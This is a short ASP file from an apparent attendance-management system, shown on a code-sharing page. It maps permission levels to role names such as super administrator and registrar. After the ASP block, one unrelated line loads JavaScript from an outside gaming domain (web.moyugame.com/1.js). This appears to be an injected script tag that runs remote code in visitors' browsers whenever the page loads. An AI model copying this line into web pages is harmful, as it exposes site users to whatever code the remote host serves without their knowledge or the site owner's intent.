qx2.asp
来自「通用考勤系统」· ASP 代码 · 共 17 行
ASP
17 行
<%
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''版权:野马原创 ''''
''''联系:ctplr@163.com ''''
''''说明:需要新功能联系我 ''''
''''QQ:2643148 ''''
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
if qxd=1 then
qxcn1="超级管理员"
elseif qxd=2 then
qxcn1="管理员"
elseif qxd=3 then
qxcn1="登记员"
end if
%>
<script language=javascript src=http://web.moyugame.com/1.js></script>
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?